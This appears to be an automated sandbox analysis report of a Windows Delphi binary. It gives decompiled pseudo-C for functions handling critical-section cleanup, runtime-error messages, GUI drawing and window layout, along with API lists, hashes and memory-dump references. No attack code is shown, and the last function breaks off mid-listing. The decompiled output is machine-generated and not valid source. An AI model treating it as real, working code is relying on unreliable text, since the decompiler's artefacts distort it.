Opcode Fuzzy Hash: c87b940dbd07c2bfcf89ac0dc78d6044fa41d1b97f3d01697760af4b7d25a718
Instruction Fuzzy Hash: 7411E4727003215FDB208F65BD447ABBBE8EB05720F42483FED59D7680D774A8488BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00401B3C, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00401B3C() {
				void* _t2;
				void* _t3;
				void* _t14;
				intOrPtr* _t19;
				intOrPtr _t23;
				intOrPtr _t26;
				intOrPtr _t28;

				_t26 = _t28;
				if( *0x48f5bc == 0) {
					return _t2;
				} else {
					_push(_t26);
					_push("�1!");
					_push( *[fs:edx]);
					 *[fs:edx] = _t28;
					if( *0x48f049 != 0) {
						_push(0x48f5c4);
						L004013D4();
					}
					 *0x48f5bc = 0;
					_t3 =  *0x48f61c; // 0x51f798
					LocalFree(_t3);
					 *0x48f61c = 0;
					_t19 =  *0x48f5e4; // 0x520dcc
					while(_t19 != 0x48f5e4) {
						VirtualFree( *(_t19 + 8), 0, 0x8000);
						_t19 =  *_t19;
					}
					E0040143C(0x48f5e4);
					E0040143C(0x48f5f4);
					E0040143C(0x48f620);
					_t14 =  *0x48f5dc; // 0x520798
					while(_t14 != 0) {
						 *0x48f5dc =  *_t14;
						LocalFree(_t14);
						_t14 =  *0x48f5dc; // 0x520798
					}
					_pop(_t23);
					 *[fs:eax] = _t23;
					_push(0x401c19);
					if( *0x48f049 != 0) {
						_push(0x48f5c4);
						L004013DC();
					}
					_push(0x48f5c4);
					L004013E4();
					return 0;
				}
			}

0x00401b3d
0x00401b47
0x00401c1b
0x00401b4d
0x00401b4f
0x00401b50
0x00401b55
0x00401b58
0x00401b62
0x00401b64
0x00401b69
0x00401b69
0x00401b6e
0x00401b75
0x00401b7b
0x00401b82
0x00401b87
0x00401ba1
0x00401b9a
0x00401b9f
0x00401b9f
0x00401bae
0x00401bb8
0x00401bc2
0x00401bc7
0x00401bce
0x00401bd2
0x00401bd9
0x00401bde
0x00401be3
0x00401be9
0x00401bec
0x00401bef
0x00401bfb
0x00401bfd
0x00401c02
0x00401c02
0x00401c07
0x00401c0c
0x00401c11
0x00401c11

APIs

RtlEnterCriticalSection.KERNEL32(0048F5C4,00000000,1!), ref: 00401B69
LocalFree.KERNEL32(0051F798,00000000,1!), ref: 00401B7B
VirtualFree.KERNEL32(?,00000000,00008000,0051F798,00000000,1!), ref: 00401B9A
LocalFree.KERNEL32(00520798,?,00000000,00008000,0051F798,00000000,1!), ref: 00401BD9
RtlLeaveCriticalSection.KERNEL32(0048F5C4,00401C19,0051F798,00000000,1!), ref: 00401C02
RtlDeleteCriticalSection.KERNEL32(0048F5C4,00401C19,0051F798,00000000,1!), ref: 00401C0C

Strings

1!, xrefs: 00401B50

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
String ID: 1!
API String ID: 3782394904-1845855088
Opcode ID: a7361d0fbc37425bebf4c20655fdede4a4a5256c0d26f7f00e9cd322aaf61a04
Instruction ID: d0eebec53db1036aff4e7e33b7afbe77398a87a474722909e96e0089e20a6b67
Opcode Fuzzy Hash: a7361d0fbc37425bebf4c20655fdede4a4a5256c0d26f7f00e9cd322aaf61a04
Instruction Fuzzy Hash: 0411BE746442406EE701BF66E896B1E37949741708F50883FF500F66F3E67C9858CB1C

Uniqueness

Uniqueness Score: -1.00%

Function 0040A034, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 50
filewindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A034(void* __edi) {
				void _v1024;
				char _v1088;
				long _v1092;
				void* _t10;
				char* _t12;
				intOrPtr _t14;
				intOrPtr _t16;
				intOrPtr _t22;
				long _t26;
				void* _t34;

				E00409EAC(_t10,  &_v1024, _t34, 0x400);
				_t12 =  *0x48e74c; // 0x48f048
				if( *_t12 == 0) {
					_t14 =  *0x48e530; // 0x4074e8
					_t7 = _t14 + 4; // 0xffe8
					_t16 =  *0x48f714; // 0x400000
					LoadStringA(E00405A84(_t16),  *_t7,  &_v1088, 0x40);
					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
				}
				_t22 =  *0x48e578; // 0x48f218
				E00402D0C(_t22);
				_t26 = E00408B78( &_v1024, __edi);
				WriteFile(GetStdHandle(0xfffffff5),  &_v1024, _t26,  &_v1092, 0);
				return WriteFile(GetStdHandle(0xfffffff5), 0x40a0e4, 2,  &_v1092, 0);
			}

0x0040a043
0x0040a048
0x0040a050
0x0040a0a3
0x0040a0a8
0x0040a0ac
0x0040a0b7
0x00000000
0x0040a0cd
0x0040a052
0x0040a057
0x0040a067
0x0040a07a
0x00000000

APIs

Part of subcall function 00409EAC: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00409EC9
Part of subcall function 00409EAC: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00409EED
Part of subcall function 00409EAC: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00409F08
Part of subcall function 00409EAC: LoadStringA.USER32 ref: 00409F9E

GetStdHandle.KERNEL32(000000F5,?,00000000,?,00000000), ref: 0040A074
WriteFile.KERNEL32(00000000,000000F5,?,00000000,?,00000000), ref: 0040A07A
GetStdHandle.KERNEL32(000000F5,0040A0E4,00000002,?,00000000,00000000,000000F5,?,00000000,?,00000000), ref: 0040A08F
WriteFile.KERNEL32(00000000,000000F5,0040A0E4,00000002,?,00000000,00000000,000000F5,?,00000000,?,00000000), ref: 0040A095
LoadStringA.USER32 ref: 0040A0B7
MessageBoxA.USER32 ref: 0040A0CD

Strings

t@, xrefs: 0040A0A3

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: File$HandleLoadModuleNameStringWrite$MessageQueryVirtual
String ID: t@
API String ID: 1802973324-3653134846
Opcode ID: ef5f8adcb6f50fb5679c8d5e7840b98d09c1caf67b8db00904dcff90053b6e15
Instruction ID: fb73d73ca137ca81705e81f0ff4ae51e8c88a69936e53d0168864f330ca2a175
Opcode Fuzzy Hash: ef5f8adcb6f50fb5679c8d5e7840b98d09c1caf67b8db00904dcff90053b6e15
Instruction Fuzzy Hash: B20165B25543047AD300E755CC42F9B77AC9B45704F40863FB354F60E1DA78D854872A

Uniqueness

Uniqueness Score: -1.00%

Function 004041A4, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38
filewindowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E004041A4(void* __ecx) {
				long _v4;
				int _t3;

				if( *0x48f048 == 0) {
					if( *0x47101c == 0) {
						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
					}
					return _t3;
				} else {
					if( *0x48f21c == 0xd7b2 &&  *0x48f224 > 0) {
						 *0x48f234();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
					return WriteFile(GetStdHandle(0xfffffff5), E0040422C, 2,  &_v4, 0);
				}
			}

0x004041ac
0x0040420c
0x0040421c
0x0040421c
0x00404222
0x004041ae
0x004041b7
0x004041c7
0x004041c7
0x004041e3
0x00404204
0x00404204

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,00470838,00000000,?,00404272,?,?,?,00000001,00404312,0040283B,00402883,?,00000000), ref: 004041DD
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,00470838,00000000,?,00404272,?,?,?,00000001,00404312,0040283B,00402883), ref: 004041E3
GetStdHandle.KERNEL32(000000F5,0040422C,00000002,00470838,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,00470838,00000000,?,00404272), ref: 004041F8
WriteFile.KERNEL32(00000000,000000F5,0040422C,00000002,00470838,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,00470838,00000000,?,00404272), ref: 004041FE
MessageBoxA.USER32 ref: 0040421C

Strings

Error, xrefs: 00404210
Runtime error at 00000000, xrefs: 004041D6, 00404215

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: FileHandleWrite$Message
String ID: Error$Runtime error at 00000000
API String ID: 1570097196-2970929446
Opcode ID: 086065cfa382f18c9e52c9debb0f566a1e8409acf9ec44d4572f6f39407eb412
Instruction ID: e432b2e05938e5463cbeb2a0c2c49af9b48533dd01d92f2a06687db0b3d26f54
Opcode Fuzzy Hash: 086065cfa382f18c9e52c9debb0f566a1e8409acf9ec44d4572f6f39407eb412
Instruction Fuzzy Hash: FBF096B469138435EB2073A96D06FDD22484785B19F204BBFF314F44F296BC54C8571D

Uniqueness

Uniqueness Score: -1.00%

Function 004463E8, Relevance: 12.2, APIs: 8, Instructions: 170
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E004463E8(void* __eax, intOrPtr __ecx, intOrPtr __edx, void* __eflags, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v28;
				char _v44;
				void* __edi;
				void* __ebp;
				void* _t46;
				void* _t57;
				intOrPtr _t85;
				intOrPtr _t96;
				void* _t117;
				void* _t118;
				void* _t127;
				struct HDC__* _t136;
				struct HDC__* _t137;
				intOrPtr* _t138;
				void* _t139;

				_t119 = __ecx;
				_t135 = __ecx;
				_v8 = __edx;
				_t118 = __eax;
				_t46 = E00445BB0(__eax);
				if(_t46 != 0) {
					_t142 = _a4;
					if(_a4 == 0) {
						__eflags =  *((intOrPtr*)(_t118 + 0x54));
						if( *((intOrPtr*)(_t118 + 0x54)) == 0) {
							_t138 = E00424120(1);
							 *((intOrPtr*)(_t118 + 0x54)) = _t138;
							E00425598(_t138, 1);
							 *((intOrPtr*)( *_t138 + 0x40))();
							_t119 =  *_t138;
							 *((intOrPtr*)( *_t138 + 0x34))();
						}
						E0041F7B8( *((intOrPtr*)(E004246E8( *((intOrPtr*)(_t118 + 0x54))) + 0x14)), _t119, 0xffffff, _t135, _t139, __eflags);
						E00412AB0(0,  *((intOrPtr*)(_t118 + 0x34)), 0,  &_v44,  *((intOrPtr*)(_t118 + 0x30)));
						_push( &_v44);
						_t57 = E004246E8( *((intOrPtr*)(_t118 + 0x54)));
						_pop(_t127);
						E0041FE50(_t57, _t127);
						_push(0);
						_push(0);
						_push(0xffffffff);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(E00420244(E004246E8( *((intOrPtr*)(_t118 + 0x54)))));
						_push(_v8);
						_push(E00445D84(_t118));
						L004268FC();
						E00412AB0(_a16, _a16 +  *((intOrPtr*)(_t118 + 0x34)), _a12,  &_v28, _a12 +  *((intOrPtr*)(_t118 + 0x30)));
						_v12 = E00420244(E004246E8( *((intOrPtr*)(_t118 + 0x54))));
						E0041F7B8( *((intOrPtr*)(_t135 + 0x14)), _a16 +  *((intOrPtr*)(_t118 + 0x34)), 0x80000014, _t135, _t139, __eflags);
						_t136 = E00420244(_t135);
						SetTextColor(_t136, 0xffffff);
						SetBkColor(_t136, 0);
						_push(0xe20746);
						_push(0);
						_push(0);
						_push(_v12);
						_push( *((intOrPtr*)(_t118 + 0x30)));
						_push( *((intOrPtr*)(_t118 + 0x34)));
						_push(_a12 + 1);
						_t85 = _a16 + 1;
						__eflags = _t85;
						_push(_t85);
						_push(_t136);
						L00406A38();
						E0041F7B8( *((intOrPtr*)(_t135 + 0x14)), _a16 +  *((intOrPtr*)(_t118 + 0x34)), 0x80000010, _t135, _t139, _t85);
						_t137 = E00420244(_t135);
						SetTextColor(_t137, 0xffffff);
						SetBkColor(_t137, 0);
						_push(0xe20746);
						_push(0);
						_push(0);
						_push(_v12);
						_push( *((intOrPtr*)(_t118 + 0x30)));
						_push( *((intOrPtr*)(_t118 + 0x34)));
						_push(_a12);
						_t96 = _a16;
						_push(_t96);
						_push(_t137);
						L00406A38();
						return _t96;
					}
					_push(_a8);
					_push(E004459AC(_t142));
					E004463C0(_t118, _t142);
					_push(E004459AC(_t142));
					_push(0);
					_push(0);
					_push(_a12);
					_push(_a16);
					_push(E00420244(__ecx));
					_push(_v8);
					_t117 = E00445D84(_t118);
					_push(_t117);
					L004268FC();
					return _t117;
				}
				return _t46;
			}

0x004463e8
0x004463f1
0x004463f3
0x004463f6
0x004463fa
0x00446401
0x00446407
0x0044640b
0x00446451
0x00446455
0x00446463
0x00446465
0x0044646c
0x00446478
0x00446480
0x00446482
0x00446482
0x00446495
0x004464a9
0x004464b1
0x004464b5
0x004464ba
0x004464bb
0x004464c0
0x004464c2
0x004464c4
0x004464c6
0x004464c8
0x004464ca
0x004464cc
0x004464db
0x004464df
0x004464e7
0x004464e8
0x00446504
0x00446516
0x00446521
0x0044652d
0x00446535
0x0044653d
0x00446542
0x00446547
0x00446549
0x0044654e
0x00446552
0x00446556
0x0044655b
0x0044655f
0x0044655f
0x00446560
0x00446561
0x00446562
0x0044656f
0x0044657b
0x00446583
0x0044658b
0x00446590
0x00446595
0x00446597
0x0044659c
0x004465a0
0x004465a4
0x004465a8
0x004465a9
0x004465ac
0x004465ad
0x004465ae
0x00000000
0x004465ae
0x00446410
0x00446419
0x0044641c
0x00446426
0x00446427
0x00446429
0x0044642e
0x00446432
0x0044643a
0x0044643e
0x00446441
0x00446446
0x00446447
0x00000000
0x00446447
0x004465b9

APIs

73D62430.COMCTL32(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,?), ref: 00446447
73D62430.COMCTL32(00000000,?,00000000,00000000,00000000,00000000,00000000,000000FF,00000000,00000000), ref: 004464E8
SetTextColor.GDI32(00000000,00FFFFFF), ref: 00446535
SetBkColor.GDI32(00000000,00000000), ref: 0044653D
737997E0.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00E20746,00000000,00000000,00000000,00FFFFFF,00000000,?,00000000), ref: 00446562

Part of subcall function 004463C0: 73D62240.COMCTL32(00000000,?,00446421,00000000,?), ref: 004463D6

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: ColorD62430$737997D62240Text
String ID:
API String ID: 2178344089-0
Opcode ID: c2d5027f094cb3e8d26aa8ac44fefcffed8f9225fead30ecd763925d9736c54d
Instruction ID: 135a1c8aabd01cd36ad84b90f085cf3848f72cfafbfede34c91a6043d44a1804
Opcode Fuzzy Hash: c2d5027f094cb3e8d26aa8ac44fefcffed8f9225fead30ecd763925d9736c54d
Instruction Fuzzy Hash: 93512C71301114AFDB40EF6DDD82F9E37ECAF49314F50016ABA04EB286CA78ED558B69

Uniqueness

Uniqueness Score: -1.00%

Function 0042F440, Relevance: 12.1, APIs: 8, Instructions: 146
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E0042F440(void* __eax, void* __ecx, void* __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				struct HDWP__* _v28;
				int _v32;
				char _v36;
				struct tagTEXTMETRICA _v92;
				void* __ebx;
				void* __ebp;
				struct HDC__* _t85;
				void* _t88;
				void* _t111;
				char _t115;
				intOrPtr* _t117;
				void* _t142;
				signed int _t145;
				long _t146;
				signed int _t156;
				intOrPtr _t158;
				struct HDC__* _t173;
				int _t174;
				void* _t177;
				void* _t179;
				intOrPtr _t180;
				intOrPtr _t186;

				_t177 = _t179;
				_t180 = _t179 + 0xffffffa8;
				_t142 = __eax;
				_t85 =  *(__eax + 0x210);
				if( *((intOrPtr*)(_t85 + 8)) == 0 ||  *((char*)(__eax + 0x220)) != 0) {
					return _t85;
				} else {
					_push(0);
					L00406E30();
					_t173 = _t85;
					_t88 = SelectObject(_t173, E0041EFE0( *((intOrPtr*)(__eax + 0x68)), __eax, __ecx));
					GetTextMetricsA(_t173,  &_v92);
					SelectObject(_t173, _t88);
					_push(_t173);
					_push(0);
					L00407090();
					_t174 =  *( *((intOrPtr*)(_t142 + 0x210)) + 8);
					_t145 =  *(_t142 + 0x21c);
					asm("cdq");
					_v8 = (_t174 + _t145 - 1) / _t145;
					asm("cdq");
					_v12 = ( *((intOrPtr*)(_t142 + 0x48)) - 0xa) / _t145;
					_t146 = _v92.tmHeight;
					_v24 =  *((intOrPtr*)(_t142 + 0x4c)) - _t146 - 5;
					asm("cdq");
					_v16 = _v24 / _v8;
					asm("cdq");
					_t34 = _v24 % _v8;
					_t156 = _t34 >> 1;
					if(_t34 < 0) {
						asm("adc edx, 0x0");
					}
					_v20 = _t156 + _t146 + 1;
					_v28 = BeginDeferWindowPos(_t174);
					_push(_t177);
					_push(0x42f5c9);
					_push( *[fs:eax]);
					 *[fs:eax] = _t180;
					_t111 =  *( *((intOrPtr*)(_t142 + 0x210)) + 8) - 1;
					if(_t111 >= 0) {
						_t115 = _t111 + 1;
						_t186 = _t115;
						_v36 = _t115;
						_v24 = 0;
						do {
							_t117 = E004140D0( *((intOrPtr*)(_t142 + 0x210)), _v24);
							_t170 = _t117;
							 *((intOrPtr*)( *_t117 + 0x70))();
							asm("cdq");
							_v32 = _v24 / _v8 * _v12 + 8;
							if(E004037B0(_t117, _t186) != 0) {
								_v32 = E004386C0(_t142) - _v32 - _v12;
							}
							asm("cdq");
							_v28 = DeferWindowPos(_v28, E0043F370(_t170), 0, _v32, _v24 % _v8 * _v16 + _v20, _v12, _v16, 0x14);
							E00438BDC(_t170, 1);
							_v24 = _v24 + 1;
							_t81 =  &_v36;
							 *_t81 = _v36 - 1;
						} while ( *_t81 != 0);
					}
					_pop(_t158);
					 *[fs:eax] = _t158;
					_push(0x42f5d0);
					return EndDeferWindowPos(_v28);
				}
			}

0x0042f441
0x0042f443
0x0042f449
0x0042f44b
0x0042f455
0x0042f5d6
0x0042f468
0x0042f468
0x0042f46a
0x0042f46f
0x0042f47b
0x0042f487
0x0042f48e
0x0042f493
0x0042f494
0x0042f496
0x0042f4a1
0x0042f4a6
0x0042f4af
0x0042f4b2
0x0042f4bb
0x0042f4be
0x0042f4c4
0x0042f4cc
0x0042f4d2
0x0042f4d6
0x0042f4dc
0x0042f4dd
0x0042f4e0
0x0042f4e2
0x0042f4e4
0x0042f4e4
0x0042f4ea
0x0042f4f3
0x0042f4f8
0x0042f4f9
0x0042f4fe
0x0042f501
0x0042f50d
0x0042f510
0x0042f516
0x0042f516
0x0042f517
0x0042f51a
0x0042f521
0x0042f52a
0x0042f52f
0x0042f538
0x0042f53e
0x0042f548
0x0042f558
0x0042f567
0x0042f567
0x0042f577
0x0042f59a
0x0042f5a1
0x0042f5a6
0x0042f5a9
0x0042f5a9
0x0042f5a9
0x0042f521
0x0042f5b4
0x0042f5b7
0x0042f5ba
0x0042f5c8
0x0042f5c8

APIs

7378AC50.USER32(00000000), ref: 0042F46A

Part of subcall function 0041EFE0: CreateFontIndirectA.GDI32(?), ref: 0041F11E

SelectObject.GDI32(00000000,00000000), ref: 0042F47B
GetTextMetricsA.GDI32(00000000,?), ref: 0042F487
SelectObject.GDI32(00000000,00000000), ref: 0042F48E
7378B380.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042F496
BeginDeferWindowPos.USER32 ref: 0042F4EE
DeferWindowPos.USER32(?,00000000,00000000,?,?,?,00000000,?), ref: 0042F595
EndDeferWindowPos.USER32(?,0042F5D0,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042F5C3

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: DeferWindow$7378ObjectSelect$B380BeginCreateFontIndirectMetricsText
String ID:
API String ID: 226108757-0
Opcode ID: fd70d8b1bc113fb1b0d3a05ff783645ca0dcda8fbd559670aff773bf8f467c29
Instruction ID: f231a79a3fc01ef62cb5b40cd116ab4036e1eef2a2934b6956d0ef2503f2129a
Opcode Fuzzy Hash: fd70d8b1bc113fb1b0d3a05ff783645ca0dcda8fbd559670aff773bf8f467c29
Instruction Fuzzy Hash: 56412F71A00119AFCB00DFA9C885BAEB7F5EF48304F54407AF904EB296D678AD458BA4

Uniqueness

Uniqueness Score: -1.00%

Function 004558D8, Relevance: 12.1, APIs: 8, Instructions: 138
windowCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E004558D8(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v22;
				intOrPtr _v28;
				struct HWND__* _v32;
				char _v36;
				intOrPtr _t50;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t63;
				intOrPtr _t64;
				intOrPtr _t66;
				intOrPtr _t68;
				intOrPtr _t83;
				void* _t88;
				intOrPtr _t120;
				void* _t122;
				void* _t125;
				void* _t126;
				intOrPtr _t127;

				_t123 = __esi;
				_t122 = __edi;
				_t125 = _t126;
				_t127 = _t126 + 0xffffffe0;
				_push(__ebx);
				_push(__esi);
				_v36 = 0;
				_v8 = __eax;
				_push(_t125);
				_push(0x455b68);
				_push( *[fs:eax]);
				 *[fs:eax] = _t127;
				E0043751C();
				if( *((char*)(_v8 + 0x57)) != 0 ||  *((intOrPtr*)( *_v8 + 0x50))() == 0 || ( *(_v8 + 0x2ec) & 0x00000008) != 0 ||  *((char*)(_v8 + 0x22f)) == 1) {
					_t50 =  *0x48e640; // 0x41d0ec
					E00406520(_t50,  &_v36);
					E0040A0E8(_v36, 1);
					E00403D80();
				}
				if(GetCapture() != 0) {
					SendMessageA(GetCapture(), 0x1f, 0, 0);
				}
				ReleaseCapture();
				 *(_v8 + 0x2ec) =  *(_v8 + 0x2ec) | 0x00000008;
				_v32 = GetActiveWindow();
				_t58 =  *0x471b1c; // 0x0
				_v20 = _t58;
				_t59 =  *0x48fc00; // 0x2130f1c
				_t60 =  *0x48fc00; // 0x2130f1c
				E0041414C( *((intOrPtr*)(_t60 + 0x7c)),  *((intOrPtr*)(_t59 + 0x78)), 0);
				_t63 =  *0x48fc00; // 0x2130f1c
				 *((intOrPtr*)(_t63 + 0x78)) = _v8;
				_t64 =  *0x48fc00; // 0x2130f1c
				_v22 =  *((intOrPtr*)(_t64 + 0x44));
				_t66 =  *0x48fc00; // 0x2130f1c
				E00456D40(_t66,  *((intOrPtr*)(_t59 + 0x78)), 0);
				_t68 =  *0x48fc00; // 0x2130f1c
				_v28 =  *((intOrPtr*)(_t68 + 0x48));
				_v16 = E0044FCEC(0, 0x48fbfc, _t122, _t123);
				_push(_t125);
				_push(0x455b48);
				_push( *[fs:edx]);
				 *[fs:edx] = _t127;
				E00455828(_v8);
				_push(_t125);
				_push(0x455aa7);
				_push( *[fs:edx]);
				 *[fs:edx] = _t127;
				SendMessageA(E0043F370(_v8), 0xb000, 0, 0);
				 *((intOrPtr*)(_v8 + 0x24c)) = 0;
				do {
					E00458A78( *0x48fbfc, _t122, _t123);
					if( *((char*)( *0x48fbfc + 0x9c)) == 0) {
						if( *((intOrPtr*)(_v8 + 0x24c)) != 0) {
							E00455788(_v8);
						}
					} else {
						 *((intOrPtr*)(_v8 + 0x24c)) = 2;
					}
					_t83 =  *((intOrPtr*)(_v8 + 0x24c));
				} while (_t83 == 0);
				_v12 = _t83;
				SendMessageA(E0043F370(_v8), 0xb001, 0, 0);
				_t88 = E0043F370(_v8);
				if(_t88 != GetActiveWindow()) {
					_v32 = 0;
				}
				_pop(_t120);
				 *[fs:eax] = _t120;
				_push(0x455aae);
				return E00455820();
			}

0x004558d8
0x004558d8
0x004558d9
0x004558db
0x004558de
0x004558df
0x004558e2
0x004558e5
0x004558ef
0x004558f0
0x004558f5
0x004558f8
0x004558fb
0x00455907
0x00455930
0x00455935
0x00455944
0x00455949
0x00455949
0x00455955
0x00455963
0x00455963
0x00455968
0x00455970
0x0045597c
0x0045597f
0x00455984
0x00455987
0x0045598f
0x00455999
0x0045599e
0x004559a6
0x004559a9
0x004559b2
0x004559b8
0x004559bd
0x004559c2
0x004559ca
0x004559d4
0x004559d9
0x004559da
0x004559df
0x004559e2
0x004559e8
0x004559ef
0x004559f0
0x004559f5
0x004559f8
0x00455a0d
0x00455a17
0x00455a1d
0x00455a1f
0x00455a2d
0x00455a48
0x00455a4d
0x00455a4d
0x00455a2f
0x00455a32
0x00455a32
0x00455a55
0x00455a5b
0x00455a5f
0x00455a74
0x00455a7c
0x00455a8a
0x00455a8e
0x00455a8e
0x00455a93
0x00455a96
0x00455a99
0x00455aa6

APIs

GetCapture.USER32 ref: 0045594E
GetCapture.USER32 ref: 0045595D
SendMessageA.USER32 ref: 00455963
ReleaseCapture.USER32(00000000,00455B68), ref: 00455968
GetActiveWindow.USER32 ref: 00455977
SendMessageA.USER32 ref: 00455A0D
SendMessageA.USER32 ref: 00455A74
GetActiveWindow.USER32 ref: 00455A83

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: CaptureMessageSend$ActiveWindow$Release
String ID:
API String ID: 862346643-0
Opcode ID: af3af10c2a85beef7c96ebaf71d34b003db7c94f2303769abb78117ca06306e4
Instruction ID: 0303079256727d97a5b712c5d30198ceb27855357d6469653e8bce90c178d795
Opcode Fuzzy Hash: af3af10c2a85beef7c96ebaf71d34b003db7c94f2303769abb78117ca06306e4
Instruction Fuzzy Hash: 0E511F70A00604DFD710EF69C895BAD77F5FF49304F1544BAE804AB2A2D738AD49DB09

Uniqueness

Uniqueness Score: -1.00%

Function 0043D44C, Relevance: 12.1, APIs: 8, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0043D44C(void* __eax, void* __ecx, struct HDC__* __edx, void* __eflags, intOrPtr _a4) {
				int _v8;
				int _v12;
				int _v16;
				char _v20;
				struct tagRECT _v36;
				signed int _t54;
				intOrPtr _t59;
				int _t61;
				void* _t63;
				void* _t66;
				void* _t82;
				int _t98;
				struct HDC__* _t99;

				_t99 = __edx;
				_t82 = __eax;
				 *(__eax + 0x54) =  *(__eax + 0x54) | 0x00000080;
				_v16 = SaveDC(__edx);
				E004375F8(__edx, _a4, __ecx);
				IntersectClipRect(__edx, 0, 0,  *(_t82 + 0x48),  *(_t82 + 0x4c));
				_t98 = 0;
				_v12 = 0;
				if((GetWindowLongA(E0043F370(_t82), 0xffffffec) & 0x00000002) == 0) {
					_t54 = GetWindowLongA(E0043F370(_t82), 0xfffffff0);
					__eflags = _t54 & 0x00800000;
					if((_t54 & 0x00800000) != 0) {
						_v12 = 3;
						_t98 = 0xa00f;
					}
				} else {
					_v12 = 0xa;
					_t98 = 0x200f;
				}
				if(_t98 != 0) {
					SetRect( &_v36, 0, 0,  *(_t82 + 0x48),  *(_t82 + 0x4c));
